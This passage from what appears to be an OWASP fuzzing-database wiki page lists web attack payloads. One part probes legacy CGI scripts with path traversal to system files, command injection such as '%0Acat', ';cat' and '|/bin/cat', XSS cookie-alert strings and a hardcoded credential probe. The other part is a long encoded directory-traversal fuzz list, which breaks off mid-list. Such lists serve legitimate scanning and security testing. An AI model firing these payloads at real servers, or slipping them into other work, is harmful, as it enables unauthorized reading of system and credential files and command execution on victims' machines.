newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
